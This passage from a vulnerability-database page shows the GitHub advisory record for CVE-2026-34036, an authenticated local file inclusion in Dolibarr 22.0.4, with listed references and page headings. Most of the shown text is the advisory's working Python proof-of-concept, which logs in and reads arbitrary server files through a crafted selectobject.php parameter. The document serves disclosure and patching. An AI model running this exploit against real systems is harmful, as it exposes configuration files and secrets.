\"loginfunction\",\n            \"username\": username,\n            \"password\": password,\n        },\n    )\n    if code \u003e= 400:\n        return False, f\"HTTP {code} on login request\"\n    if looks_authenticated(after_login):\n        return True, \"\"\n    code, home = request(opener, base_url, \"GET\", \"/index.php?mainmenu=home\")\n    if code \u003c 400 and looks_authenticated(home):\n        return True, \"\"\n    return False, \"Invalid username or password\"\n\ndef read_file(opener, base_url, relative_path):\n    status, body = request(\n        opener,\n        base_url,\n        \"GET\",\n        \"/core/ajax/selectobject.php\",\n        params={\n            \"outjson\": \"0\",\n            \"htmlname\": \"x\",\n            \"objectdesc\": f\"A:{relative_path}:0\",\n        },\n    )\n    if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):\n        raise RuntimeError(\"Session expired or not authenticated\")\n    return status, body, clean_included_output(body)\n\ndef parse_args():\n    parser = argparse.ArgumentParser(\n        description=\"Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4).\"\n    )\n    parser.add_argument(\n        \"--url\",\n        default=\"http://127.0.0.1:8080\",\n        help=\"Dolibarr base URL (default: http://127.0.0.1:8080)\",\n    )\n    parser.add_argument(\"--username\", required=True, help=\"Dolibarr username\")\n    parser.add_argument(\"--password\", required=True, help=\"Dolibarr password\")\n    parser.add_argument(\n        \"--file\",\n        dest=\"target_file\",\n        required=True,\n        help=\"Target file to read (e.g. conf/.htaccess).\",\n    )\n    return parser.parse_args()\n\ndef print_result(path, status, raw, clean):\n    print(f\"\\n[+] HTTP status: {status}\")\n    print(f\"[+] Requested file: {path}\")\n    print(\"=\" * 80)\n    if clean:\n        print(html.unescape(clean))\n    else:\n        print(\"(No readable output extracted)\")\n    print(\"=\" * 80)\n    if clean != raw.rstrip():\n        print(\"[i] PHP warnings/fatal output were trimmed from display.\")\n\ndef summarize_error_body(body, limit=1200):\n    text = html.unescape(body).strip()\n    if not text:\n        return \"(Empty response body)\"\n    if len(text) \u003e limit:\n        return text[:limit].rstrip() + \"\\n... [truncated]\"\n    return text\n\ndef main():\n    args = parse_args()\n    opener = urllib.request.build_opener(\n        urllib.request.HTTPCookieProcessor(CookieJar())\n    )\n    ok, reason = login(opener, args.url, args.username, args.password)\n    if not ok:\n        print(f\"[!] {reason}\")\n        return 1\n    print(\"[+] Login successful.\")\n    try:\n        status, raw, clean = read_file(opener, args.url, args.target_file)\n        if status \u003e= 400:\n            print(f\"[!] HTTP {status} while reading target file.\")\n            print(\"=\" * 80)\n            print(summarize_error_body(raw))\n            print(\"=\" * 80)\n            return 1\n        print_result(args.target_file, status, raw, clean)\n        return 0\n    except Exception as exc:\n        print(f\"[!] Error: {exc}\")\n        return 1\n\nif __name__ == \"__main__\":\n    try:\n        raise SystemExit(main())\n    except KeyboardInterrupt:\n        print(\"\\nInterrupted.\")\n        raise SystemExit(130)\n```",
  "id": "GHSA-2mfj-r695-5h9r",
  "modified": "2026-03-31T18:40:14Z",
  "published": "2026-03-27T18:04:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34036"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Dolibarr/dolibarr"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php "
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-34036 (GCVE-0-2026-34036)

FKIE_CVE-2026-34036

GHSA-2MFJ-R695-5H9R

Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure

Target

Summary

Vulnerability Details

Steps to Reproduce

Impact

Suggested Mitigation

Disclosure Policy & Assistance

Video PoC

PoC Script

Tags

Sightings

Nomenclature